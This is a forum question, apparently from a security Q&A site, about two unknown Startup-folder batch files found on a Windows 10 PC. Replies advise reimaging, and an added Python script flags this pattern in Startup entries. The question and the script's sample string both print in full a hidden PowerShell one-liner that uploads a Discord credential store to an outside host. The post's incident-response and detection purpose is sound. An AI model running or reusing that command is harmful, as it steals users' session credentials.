
Upon turning on my personal Windows 10 computer tonight, I was greeted with ConEmu telling me that two PowerShell commands were run at startup. Both commands were the same thing:

powershell -windowstyle hidden -Command "& {&invoke-webrequest -method put -infile 'C:\Users\foo\AppData\Roaming\Discord\Local Storage\leveldb\000005.ldb' https://rip.rblx.dev/c/}"

The source of these commands is two batch files in C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp - LVTUSIX.bat and LVTUSIXd.bat. Both files were created this morning while I was away from my computer (about 30 min after turning it on). I'm unaware of a way to see who/what created the files - they are owned by the administrators group.

I can't find anything online about rip.rblx.dev or these batch files. A whois lookup on the domain reveals that all the info is privacy-protected.

I'm very suspicious as some research reveals that these .ldb files contain Discord user credentials.

Is anyone aware of what might be going on? Alternatively, does anyone have advice on how I might be able to find more info? I've since temporarily mangled the files to prevent them from running until I learn more. Thank you in advance.

Mike Boch
  • Sounds like you've been hacked. – Alexander O'Mara Apr 16 '19 at 00:16
  • Yes that's certainly my worry. I'm trying to gather more info to both A) confirm and B) figure out where it came from. – Mike Boch Apr 16 '19 at 00:18
  • The discord connection is for command & control to circumvent firewall issues. Turn the computer off and do not turn it on again until it has been re-imaged. – trognanders Apr 16 '19 at 01:02
  • Thank you all for the info. I've shut it off and will be completely wiping it + all connected drives tomorrow. This certainly sucks but oh well. I genuinely have no idea where this came from, but will be taking additional precautions to prevent it in the future. – Mike Boch Apr 16 '19 at 03:13
  • Change your passwords on a clean computer as fast as possible. – Hugo Apr 16 '19 at 09:17
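Added example, not code from the question or the answer: a Python triage script that reads Startup-folder scripts and flags the pattern described above (hidden PowerShell window, an Invoke-WebRequest PUT of a local credential store to a remote URL), listing each entry with its creation time. The Startup folder paths, the credential-store path fragments and the function names are my assumptions; the sample batch content is the command quoted in the question.

```python
import os
import re
from pathlib import Path

# Startup folders whose entries run at logon (all users under ProgramData, per user under APPDATA).
STARTUP_DIRS = [Path(os.environ.get(var, ".")) / r"Microsoft\Windows\Start Menu\Programs\Startup"
                for var in ("ProgramData", "APPDATA")]
# Path fragments of local session/credential stores; uploading one of these is the key signal.
CREDENTIAL_STORE_HINTS = (r"\discord\local storage\leveldb", r"\login data", r"\cookies")
RE_HIDDEN = re.compile(r"-windowstyle\s+hidden", re.I)
RE_WEBREQ = re.compile(r"invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b", re.I)
RE_UPLOAD = re.compile(r"-method\s+(put|post)", re.I)
RE_INFILE = re.compile(r"-infile\s+(?:'([^']+)'|\"([^\"]+)\"|(\S+))", re.I)
RE_URL = re.compile(r"https?://[^\s'\"}]+", re.I)

def triage_startup_entry(name: str, content: str) -> dict:
    """Classify one Startup-folder script from its text alone (nothing is executed)."""
    m = RE_INFILE.search(content)
    infile = next((g for g in m.groups() if g), None) if m else None
    url = RE_URL.search(content)
    result = {
        "name": name,
        "hidden_window": bool(RE_HIDDEN.search(content)),
        "network_upload": bool(RE_WEBREQ.search(content) and RE_UPLOAD.search(content)),
        "upload_source": infile,
        "destination": url.group(0) if url else None,
        "uploads_credential_store": bool(infile) and any(h in infile.lower() for h in CREDENTIAL_STORE_HINTS),
    }
    result["verdict"] = ("likely credential exfiltration" if result["network_upload"] and result["uploads_credential_store"]
                         else "suspicious" if result["hidden_window"] or result["network_upload"] else "no indicators")
    return result

def scan_startup_folders(dirs=STARTUP_DIRS) -> list:
    """Triage every script in the Startup folders and record its creation time (st_ctime is creation
    time on Windows only). The creating process is not in file metadata; that needs object-access
    auditing in the Security event log, which is off by default."""
    results = []
    for d in (d for d in dirs if d.is_dir()):
        for p in d.iterdir():
            if p.suffix.lower() in (".bat", ".cmd", ".ps1", ".vbs", ".js"):
                r = triage_startup_entry(p.name, p.read_text(errors="ignore"))
                r["created_epoch"] = p.stat().st_ctime
                results.append(r)
    return results

# Constructed sample: the batch file contents quoted in the question above.
SAMPLE_BAT = r"""powershell -windowstyle hidden -Command "& {&invoke-webrequest -method put -infile 'C:\Users\foo\AppData\Roaming\Discord\Local Storage\leveldb\000005.ldb' https://rip.rblx.dev/c/}"
"""
```

Run `scan_startup_folders()` on the affected machine (from an offline boot or before reimaging) to get the verdict and creation time of every Startup entry; `triage_startup_entry("LVTUSIX.bat", SAMPLE_BAT)` shows the result for the command from the question.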

1 Answer


Checking the domain and its siblings on VirusTotal can be useful.

According to VirusTotal the parent rblx.dev domain points to an IP (91.195.240.94) which looks like a malware command & control server. So I'd say chances are high your PC has been compromised, and you might want to reimage it entirely (particularly as whoever dropped the scripts has elevated privileges already).

markeldo
  • Thank you! I'll be completely wiping it and starting over tomorrow. Unfortunately, I'm not sure I'll ever know where this came from. – Mike Boch Apr 16 '19 at 03:14